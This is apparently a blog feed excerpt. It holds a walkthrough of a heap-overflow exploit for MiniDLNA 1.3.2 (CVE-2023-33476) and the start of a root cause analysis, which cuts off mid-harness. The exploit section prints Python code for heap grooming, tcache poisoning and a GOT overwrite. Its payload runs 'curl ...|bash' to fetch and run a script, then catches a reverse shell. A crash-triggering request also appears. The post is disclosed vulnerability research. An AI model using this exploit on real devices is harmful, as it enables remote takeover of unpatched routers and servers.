<h2 id="exploit-arbitrary-rw-via-tcache-poisoning-for-rce">Exploit: Arbitrary R/W via Tcache Poisoning for RCE</h2>

<p>Whew! That was a lot of background to cover but hopefully that will all help with making sense of
the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll
avoid going into specifics like sizes and addresses since those are variable and not critical for
understanding how the exploit works. The source code for the exploits has been heavily commented if
you’re interested in more details.</p>

<p>The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer
to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the
Global Offset Table (GOT) and overwrite the entries for <code class="language-plaintext highlighter-rouge">free()</code> and <code class="language-plaintext highlighter-rouge">fprintf()</code> to point to
<code class="language-plaintext highlighter-rouge">system()</code>. <code class="language-plaintext highlighter-rouge">free()</code> is targeted as it will be called for <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> at the end of request handling,
transforming the call from <code class="language-plaintext highlighter-rouge">free(h-&gt;req_buf)</code> to <code class="language-plaintext highlighter-rouge">system(h-&gt;req_buf)</code>. The payload sent for the final
allocation where the GOT is corrupted begins with a shell command that will download and execute a
script from an attacker-controlled server and spawn a reverse shell.</p>

<h3 id="setup-building-the-target">setup: building the target</h3>

<p>The exploit is written for a binary with only partial RELRO and no PIE; the address of <code class="language-plaintext highlighter-rouge">system()</code>
in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM
using Glibc 2.31 (default version installed by OS).</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># install deps</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev <span class="se">\</span>
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
<span class="nb">cd </span>minidlna-git <span class="o">&amp;&amp;</span> git checkout tags/v1_3_2
./autogen.sh
./configure <span class="nt">--enable-tivo</span> <span class="nv">CC</span><span class="o">=</span>clang <span class="nv">CFLAGS</span><span class="o">=</span><span class="s2">"-g -O0 -fstack-protector"</span>
make minidlnad <span class="nv">CC</span><span class="o">=</span>clang <span class="nv">CFLAGS</span><span class="o">=</span><span class="s2">"-g -O0 -fstack-protector"</span>
</code></pre></div></div>

<p>This is the output of the <code class="language-plaintext highlighter-rouge">checksec</code> tool for the output binary:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-&gt;</span> <span class="o">%</span> <span class="n">checksec</span> <span class="p">.</span><span class="o">/</span><span class="n">minidlnad</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="sh">'</span><span class="s">/home/hyper/minidlna-1.3.2/minidlnad</span><span class="sh">'</span>
    <span class="n">Arch</span><span class="p">:</span>     <span class="n">amd64</span><span class="o">-</span><span class="mi">64</span><span class="o">-</span><span class="n">little</span>
    <span class="n">RELRO</span><span class="p">:</span>    <span class="n">Partial</span> <span class="n">RELRO</span>
    <span class="n">Stack</span><span class="p">:</span>    <span class="n">Canary</span> <span class="n">found</span>
    <span class="n">NX</span><span class="p">:</span>       <span class="n">NX</span> <span class="n">enabled</span>
    <span class="n">PIE</span><span class="p">:</span>      <span class="n">No</span> <span class="nc">PIE </span><span class="p">(</span><span class="mh">0x400000</span><span class="p">)</span>
</code></pre></div></div>

<p>The server can be started using the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo ./minidlnad -R -f minidlna.conf -d
</code></pre></div></div>

<h3 id="tcache-poisoning-tldr">tcache poisoning tl;dr</h3>

<p>I’ll assume you have some background on heap exploit techniques so won’t go super in-depth here but
if not I highly recommend the <a href="https://github.com/shellphish/how2heap">how2heap</a> series on Github.
It covers basically every known technique and has up-to-date examples for the latest Glibc
versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional
constraints and checks that will need to be bypassed.</p>

<p>At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation
and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into
returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and
inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the
tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free
chunks in both directions, it only keeps a singly-linked list using the <code class="language-plaintext highlighter-rouge">fd</code> fields of the
<code class="language-plaintext highlighter-rouge">free()</code>‘d chunks to keep track of them. By corrupting the <code class="language-plaintext highlighter-rouge">fd</code> pointer of a free’d chunk in a
tcache bin for a given size, a subsequent call to <code class="language-plaintext highlighter-rouge">malloc()</code> for that size will result in the
allocator returning the chunk pointed to by <code class="language-plaintext highlighter-rouge">fd</code>.</p>

<h3 id="constructing-the-fake-chunk-for-poisoning">constructing the fake chunk for poisoning</h3>

<p>Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s
already been free’d and this chunk needs to be located after the request buffer containing the
payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so
we control its contents and can place the payload data we want written to the target location (the
<code class="language-plaintext highlighter-rouge">fd</code> pointer) within it. One important thing to note is that because we free the chunk before
corrupting it, the first 16 bytes of the data we send will be overwritten by <code class="language-plaintext highlighter-rouge">free()</code> to store the
<code class="language-plaintext highlighter-rouge">fd</code> and <code class="language-plaintext highlighter-rouge">bk</code> pointers (though technically only the <code class="language-plaintext highlighter-rouge">fd</code> pointer is actually used by tcache), so the
payload data sent is placed at +16-byte offset into the buffer to avoid it being corrupted before
we copy it over the target location.</p>

<p>The illustration below shows how this chunk would look before and after being free’d, with
<code class="language-plaintext highlighter-rouge">return_addr</code> at the right offset to ensure its left intact.</p>

<p><img src="/assets/images/chonked-images/fake-chunk-1.png" alt="fake-chunk-1.png" /></p>

<h3 id="heap-preparation">heap preparation</h3>

<p>The first step taken is to use the techniques described earlier in the post to set the heap up so
that we can get allocations created sequentially and spray the fake chunks described in the
previous section into those allocations to use them later.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># * the socks at the end of this list should all be right next to each other
</span>    <span class="c1"># * we'll free these LIFO from the tail to ensure our next allocs for the corruption 
</span>    <span class="c1">#   will come from that sequential chunks. we need at least 2-3 sequential chunks so we use
</span>    <span class="c1">#   a total of 10 allocations here
</span>
    <span class="c1"># create and connect needed sockets before sending any data on any of them. This should
</span>    <span class="c1"># keep the allocations for the upnphttp structs separate from the request buffer allocations.
</span>    <span class="n">GROOMING_ALLOCS</span> <span class="o">=</span> <span class="mi">10</span>
    <span class="nf">xpr</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">starting heap grooming round, using </span><span class="si">{</span><span class="n">GROOMING_ALLOCS</span><span class="si">}</span><span class="s"> allocs...</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">dummies</span> <span class="o">=</span> <span class="nf">create_sockets</span><span class="p">(</span><span class="n">GROOMING_ALLOCS</span><span class="p">)</span>
    <span class="nf">connect_sockets</span><span class="p">(</span><span class="n">dummies</span><span class="p">,</span> <span class="n">server_ip</span><span class="p">,</span> <span class="n">server_port</span><span class="p">)</span>

    <span class="c1"># This is the target address we want malloc to return after the chunk has been corrupted
</span>    <span class="n">where</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">pack</span><span class="p">(</span><span class="n">target_addr</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span>

    <span class="c1"># create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
</span>    <span class="c1"># (fd, bk)
</span>    <span class="n">pre_pad</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x11</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">16</span> <span class="c1"># \x11 is arbitrary
</span>    <span class="n">core</span> <span class="o">=</span> <span class="n">pre_pad</span> <span class="o">+</span> <span class="n">where</span>

    <span class="c1"># pad the end of the paylaod with enough bytes to meet the size needed for the target tcache bin
</span>    <span class="c1"># allocations need to be kept the same size because tcache bins must match exact sizes
</span>    <span class="n">payload</span> <span class="o">=</span> <span class="nf">pad</span><span class="p">(</span><span class="n">ALLOC_SIZE</span><span class="p">,</span> <span class="n">core</span><span class="p">)</span>

    <span class="c1"># send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
</span>    <span class="c1"># the last 3-4 will be allocated sequentially.
</span>    <span class="nf">sendsocks</span><span class="p">(</span><span class="n">dummies</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

    <span class="c1"># free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
</span>    <span class="c1"># so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
</span>    <span class="c1"># both the upnphttp structs and the request buffers they contain.
</span>    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
</code></pre></div></div>

<p>After this code runs and the last few allocations are dropped, those free’d chunks should look
something like this in memory and should be in the tcache bin for the matching size (0x60):</p>

<p><img src="/assets/images/chonked-images/fake-chunk-2.png" alt="fake-chunk-2.png" /></p>

<h3 id="poisoning-the-freed-chunk">poisoning the free’d chunk</h3>

<p>Immediately after setting up the heap, the exploit then initiates a connection for the request
that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to
trigger the corruption is padded to match the size of the chunks we just free’d in the previous
step so when the allocation is made, <code class="language-plaintext highlighter-rouge">malloc()</code> will return the last chunk that was inserted into
the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted
into the corresponding tcache bin will be the top chunk shown in the illustration above (at the
lower addresses), so that’s the chunk we’ll get back.</p>

<p>Assuming everything is set up correctly, the chunk for the corruption request and the target chunk
will then look like this (the buffer containing the corruption payload highlighted in green). As
can be seen, things are now set up in such a way that we should be able to use the OOB read to
read past the end of the buffer containing the corruption payload and into the free’d chunk
immediately after it. The free’d chunks still contain the return address payload we want to have
written over the <code class="language-plaintext highlighter-rouge">fd</code> pointer of the same chunk, so we should be able to reach <code class="language-plaintext highlighter-rouge">return_addr</code> with
the call to <code class="language-plaintext highlighter-rouge">memmove()</code> since we have full control over the <code class="language-plaintext highlighter-rouge">len</code> argument.</p>

<p><img src="/assets/images/chonked-images/fake-chunk-3.png" alt="fake-chunk-3.png" /></p>

<p>The write portion of the <code class="language-plaintext highlighter-rouge">memmove()</code> will then “slide” the selected region of bytes “up” (based on
the illustration above) so that <code class="language-plaintext highlighter-rouge">return_addr</code> ends up overwriting <code class="language-plaintext highlighter-rouge">fd</code> 40 bytes below it. To
accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace
characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the
desired location as described in the <strong>“controlling the shift distance”</strong> section earlier in the
post. Once this request has been processed, it will get free’d and inserted back into the same
tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this
(note that the <code class="language-plaintext highlighter-rouge">size, prev_size, etc</code> values shown at the end of the corruption buf are from the
chunk below it, showing where those values end up after the call to <code class="language-plaintext highlighter-rouge">memmove()</code>):</p>

<p><img src="/assets/images/chonked-images/fake-chunk-4.png" alt="fake-chunk-4.png" /></p>

<p>In order to get the tainted chunk returned to us (the middle one in the illustration), we’ll need
to make at least 1 allocation of that same size before that and then the next allocation of that
size will have <code class="language-plaintext highlighter-rouge">malloc()</code> return the pointer we wrote to <code class="language-plaintext highlighter-rouge">fd</code> back to us. In the case of the
exploit, this will be the address of the Global Offset Table (GOT).</p>

<h3 id="corrupting-the-got">corrupting the GOT</h3>

<p>After successfully tricking <code class="language-plaintext highlighter-rouge">malloc()</code> into returning a pointer to the GOT, the next step is to
corrupt one (or more) of the entries contained within to achieve code execution. The most
straightforward way to do this is to call <code class="language-plaintext highlighter-rouge">system()</code> and pass it a pointer to some data we
control containing a string with the command we want to execute. Since we have full control over
the content that’s written, the question is then to figure out <em>which</em> function(s) to corrupt.
Because <code class="language-plaintext highlighter-rouge">system()</code> expects a single argument that’s a pointer to some string data, the function(s)
we target must also take a char (or void) pointer for its first argument and that pointer has to
point to data we control. Finally, the target function(s) need to be called at some point after
we’ve corrupted the GOT but <em>before</em> any other GOT entries that we’ve corrupted are referenced,
since this will almost certainly result in a crash.</p>

<p>Taking all of this into consideration, I eventually found the two functions that would be targeted:
<code class="language-plaintext highlighter-rouge">fprintf()</code> and <code class="language-plaintext highlighter-rouge">free()</code>. The actual entry that produces the code execution is <code class="language-plaintext highlighter-rouge">free()</code> but because
the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial
writes into the request buffer, successfully corrupting <code class="language-plaintext highlighter-rouge">free()</code> also results in corrupting other
GOT entries, including the one for <code class="language-plaintext highlighter-rouge">fprintf()</code>, so it needs to point to a valid function since it’s
called at least once before the next call to <code class="language-plaintext highlighter-rouge">free()</code>. Corrupting <code class="language-plaintext highlighter-rouge">free()</code> is a logical option since
it meets all of the requirements without any additional setup: it takes a single pointer argument
and will be called and passed the pointer to our request buffer almost immediately after we corrupt
the GOT, reducing the risk of other functions that have been corrupted being called and crashing
the application prematurely. <strong><em>As a bonus, hijacking <code class="language-plaintext highlighter-rouge">free()</code> also helps us avoid triggering the
sanity checks in Glibc that would trigger an <code class="language-plaintext highlighter-rouge">abort()</code> after we’ve corrupted the heap metadata.</em></strong></p>

<p>Because <code class="language-plaintext highlighter-rouge">free()</code> (i.e. <code class="language-plaintext highlighter-rouge">system()</code> after the GOT is corrupted) will be called on the pointer to the
GOT where we’re writing the fake entries to, we can insert the command string we want passed to
<code class="language-plaintext highlighter-rouge">system()</code> right at the start of the buffer to have it executed. The code below shows the
construction of the final payload containing the command to run and the fake GOT entries with the
padding needed for the binary the exploit was written for (<code class="language-plaintext highlighter-rouge">free()</code> at GOT+0x40, <code class="language-plaintext highlighter-rouge">fprintf()</code> at
GOT+0x50):</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># set up the command string that will be passed to system()
</span>    <span class="n">staging_server_addr</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lhost</span><span class="si">}</span><span class="s">:</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="si">}</span><span class="sh">"</span>
    <span class="c1"># command: e.g. `curl 192.168.1.8:8080/x|bash`
</span>    <span class="n">command_str</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">curl </span><span class="si">{</span><span class="n">staging_server_addr</span><span class="si">}</span><span class="s">/x|bash</span><span class="sh">"</span><span class="p">.</span><span class="nf">encode</span><span class="p">()</span>
    <span class="n">command_padding</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span>

    <span class="c1"># final cmd string max len is 64, if less than, pad it out
</span>    <span class="n">OFFSET_TO_FREE</span> <span class="o">=</span> <span class="mi">64</span>
    <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">command_str</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">OFFSET_TO_FREE</span><span class="p">:</span>
        <span class="n">command_padding</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x00</span><span class="sh">"</span> <span class="o">*</span> <span class="p">(</span><span class="n">OFFSET_TO_FREE</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">command_str</span><span class="p">))</span>
    <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">command_str</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">OFFSET_TO_FREE</span><span class="p">:</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">command string too long using provided args, offsets will fail. bailing...</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">command</span> <span class="o">=</span> <span class="n">command_str</span> <span class="o">+</span> <span class="n">command_padding</span>

    <span class="c1"># set up fake GOT table for the overwrite (note: this will need to updated for binaries that have different offsets between the two)
</span>    <span class="n">got_table</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span>
    <span class="n">got_table</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">p64</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">system_addr</span><span class="p">)</span> <span class="c1"># free() entry
</span>    <span class="n">got_table</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">)</span> <span class="c1"># pad
</span>    <span class="n">got_table</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">p64</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">system_addr</span><span class="p">)</span> <span class="c1"># fprintf() entry
</span>
    <span class="n">final_payload</span> <span class="o">=</span> <span class="n">command</span> <span class="o">+</span> <span class="n">got_table</span>
</code></pre></div></div>

<p>After the final payload above has been sent and the GOT has been corrupted, the next call to
<code class="language-plaintext highlighter-rouge">free()</code> will actually be a call to <code class="language-plaintext highlighter-rouge">system()</code> and it will be passed the pointer where we just
wrote the payload.</p>

<h3 id="reverse-shell-stager-and-listener">reverse shell stager and listener</h3>

<p>The command string passed to <code class="language-plaintext highlighter-rouge">system()</code> will download a script from an attacker-controlled server
using <code class="language-plaintext highlighter-rouge">curl</code> and pipe the contents of the script to <code class="language-plaintext highlighter-rouge">bash</code>. The exploit sets up an HTTP listener
to handle the incoming request and responds with a small script to initiate a reverse shell back to
the attacker-controlled server. After responding to that request, it creates the listener for the
reverse shell and waits for the connection.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># handle the http request to serve script to spawn reverse shell
</span>    <span class="n">l</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="nf">wait_for_connection</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">x</span><span class="p">.</span><span class="nf">connected</span><span class="p">():</span>
        <span class="n">l</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">resp</span><span class="p">.</span><span class="nf">encode</span><span class="p">()</span> <span class="o">+</span> <span class="n">reverse_shell_cmd</span><span class="p">.</span><span class="nf">encode</span><span class="p">())</span>
        <span class="n">l</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="nf">xerr</span><span class="p">(</span><span class="sh">"</span><span class="s">=ERROR=: Timed out waiting for staging connection, exploit likely failed</span><span class="sh">"</span><span class="p">)</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="c1"># wait for the incoming reverse shell connection; bail if we don't get it in a second.
</span>    <span class="n">l</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">listen</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="p">)</span>
    <span class="n">l</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="nf">wait_for_connection</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">x</span><span class="p">.</span><span class="nf">connected</span><span class="p">():</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">~~~ &lt;CHONKCHONKCHONK&gt; ~~~</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">l</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="nf">xerr</span><span class="p">(</span><span class="sh">"</span><span class="s">=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed</span><span class="sh">"</span><span class="p">)</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

</code></pre></div></div>

<h3 id="popping-a-shell">popping a shell</h3>
<p>And here’s the exploit running against the target binary:</p>

<p><img src="/assets/images/chonked-images/exploit.png" alt="exploit.png" /></p>

<h2 id="wrapping-up">Wrapping Up</h2>

<p>And there we are! Hopefully this has all been useful for understanding everything that goes into
writing a full exploit for this kind of vulnerability. Ultimately, it isn’t <em>complete</em> in the sense
that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could
potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe
that can be left as an exercise for the curious reader.</p>

<h3 id="exploitability-in-the-real-worldtm">exploitability in the Real World(TM)</h3>

<p>Exploitability of this bug will be dependent upon the Libc version the application is linked against
and compiler exploit mitigations used, to some extent. Given the variability of these factors across
the range of devices this application is deployed to (IoT, routers, linux servers), there is a
high likelihood of finding Libc versions vulnerable to multiple heap exploit techniques and missing
exploit mitigations such as ASLR, RELRO, etc. Ultimately, because the bug provides for a strong write
primitive, there are various options for exploitation. While most modern Linux distros running on
desktop/server hardware now enable common compiler exploit mitigations for default applications and
applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices
where those mitigations are likely to not be enabled; versions built from source by end-users are
also unlikely to enable these mitigations. The exploit strategy and mechanisms used in the included
exploits will not work universally across all platforms and configurations, but there are likely
dozens of targets that would meet the necessary criteria.</p>

<h3 id="arm32-exploit">arm32 exploit?</h3>

<p>This post is already pretty long and it’s taken me longer than expected to release it, so I’ve
decided the split the last section going over the exploit I wrote for the arm32 <code class="language-plaintext highlighter-rouge">minidlnad</code> binary
from the Netgear RAX30 into a separate post, though the exploit code for both will be made
available now. That exploit works a little differently, targeting the stack rather than the GOT for
overwrite since that binary has full RELRO enabled (which makes the GOT read-only).</p>

<h2 id="resources">Resources</h2>

<ul>
  <li><a href="https://github.com/mellow-hype/cve-2023-33476">Exploit Code Repo</a></li>
  <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Transfer-Encoding">Mozilla - HTTP Transfer Encoding</a></li>
  <li><a href="https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/">Azaria Labs - Understanding the Glibc Heap Implementation</a></li>
  <li><a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/">Understanding Glibc Malloc</a></li>
  <li><a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/tcache_poisoning.c">how2heap -Tcache Poisoning</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="0day" /><category term="minidlna" /><category term="exploit" /><category term="cve-2023-33476" /><summary type="html"><![CDATA[second part in a two-part series going over heap overflow in MiniDLNA (CVE-2023-33476). this post provides a walkthrough of steps taken to write an exploit for this vulnerability in order to achieve remote code execution and pop a shell.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/chonked-images/chonky.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/chonked-images/chonky.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis</title><link href="https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca.html" rel="alternate" type="text/html" title="chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis" /><published>2023-05-31T00:00:00+00:00</published><updated>2023-05-31T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca.html"><![CDATA[<p>This post provides the details and a root cause analysis of a heap buffer overflow vulnerability
I discovered in the HTTP chunk parsing code of MiniDLNA, affecting versions up to 1.3.2. This vulnerability can
be exploited to achieve remote code execution in the context of the user that the minidlna server is
running as. The issue was reported to the package maintainer following best practices for
responsible disclosure and a fixed version is now available. A follow up post will be published soon
with a detailed write-up of the exploit development process along with two fully weaponized exploits
for both x86_64 and ARM32 targets, so stay tuned :)</p>

<p><em>Update: The second part of this post has been published and can be found
<a href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html">here</a></em></p>

<h2 id="introduction">Introduction</h2>
<p><strong><em>Update 2023-06-02: The vulnerability has been assigned CVE-2023-33476.</em></strong></p>

<p>This post will go over the details and root cause of a heap buffer overflow vulnerability
I discovered in the HTTP chunk parsing code of MiniDLNA, affecting up to version 1.3.2. This vulnerability can
be exploited to achieve remote code execution in the context of the user that the minidlna server is
running as.</p>

<p>The second part of this post contains a detailed write-up of the exploit development process
along with two fully weaponized exploits for both x86_64 and ARM32 targets and can be found <a href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html">here</a>.</p>

<h3 id="vulnerability-summary">Vulnerability Summary</h3>
<p>MiniDLNA is a simple media server software, with the aim of being fully compliant with
DLNA/UPnP-AV clients. It is commonly deployed on Linux servers and across a wide range of embedded
devices like routers and NAS devices.</p>

<p>The latest version of the MiniDLNA/ReadyMedia media server contains a vulnerability in the HTTP
request processing code responsible for handling requests that use chunked encoding which can result
in an out-of-bounds read/write leading to remote code execution. The issue occurs in the validation
logic for chunk sizes in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> and results in the return value of a
comparison expression being incorrectly saved to a variable used to track the parsed chunk
size rather than the return value of <code class="language-plaintext highlighter-rouge">strtol()</code> that’s used to parse the size. This allows for
values larger than the total request size to pass validation; the application later parses and
passes these chunk size values as the <code class="language-plaintext highlighter-rouge">size</code> argument in call(s) to <code class="language-plaintext highlighter-rouge">memmove()</code>, resuling in an OOB
read/write on the heap.</p>

<h3 id="affected-versions">Affected Versions</h3>

<ul>
  <li>All versions between 1.1.5 and 1.3.2 (inclusive)</li>
  <li>Default versions provided by <code class="language-plaintext highlighter-rouge">apt</code> on Debian 11 and Ubuntu 22.04</li>
  <li>Version deployed on the Netgear Nighthawk RAX30 w/ latest patches</li>
</ul>

<h3 id="minimal-testcase-to-trigger-the-bug">Minimal Testcase to Trigger the Bug</h3>

<p>This testcase will trigger the bug by passing a huge value (<code class="language-plaintext highlighter-rouge">0xffffff</code>) that is much larger than the
total request length sent, resulting in an OOB read past the end of the request buffer allocation
and into unmapped memory. The application should crash with a segmentation fault.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /status HTTP/1.0\r\nTransfer-Encoding:chunked\r\n\r\nffffff\r\n0\r\n\r\n
</code></pre></div></div>

<h2 id="discovery">Discovery</h2>

<p>I originally discovered this vulnerability while fuzzing an older version of the software while
hunting for bugs on the Netgear RAX45. I wasn’t familiar enough with the code base to know exactly
the right place to fuzz so I just chose to go for the most reachable part of the code: HTTP request
handling. Fuzzing was done using both LibFuzzer and AFL++ using custom harnesses. I made some minor
changes to the code to improve fuzzability, including removal of the network read/write
functionality, but otherwise no other changes were needed.</p>

<p>The core portion of the harness used to find this particular bug is shown below. The full harness
code and other helper code will be released soon.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stddef.h&gt;</span><span class="cp">
#include</span> <span class="cpf">"minixml.h"</span><span class="cp">
#include</span> <span class="cpf">"upnphttp.h"</span><span class="cp">
#include</span> <span class="cpf">"upnpsoap.h"</span><span class="cp">
#include</span> <span class="cpf">"containers.h"</span><span class="cp">
#include</span> <span class="cpf">"upnpreplyparse.h"</span><span class="cp">
#include</span> <span class="cpf">"scanner.h"</span><span class="cp">
#include</span> <span class="cpf">"log.h"</span><span class="cp">
</span>
<span class="kt">void</span> <span class="nf">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="k">struct</span> <span class="n">upnphttp</span> <span class="o">*</span><span class="p">);</span>

<span class="kt">int</span> <span class="nf">LLVMFuzzerTestOneInput</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">upnphttp</span> <span class="o">*</span><span class="n">h</span> <span class="o">=</span> <span class="n">New_upnphttp</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">endheaders</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">size</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">)</span>
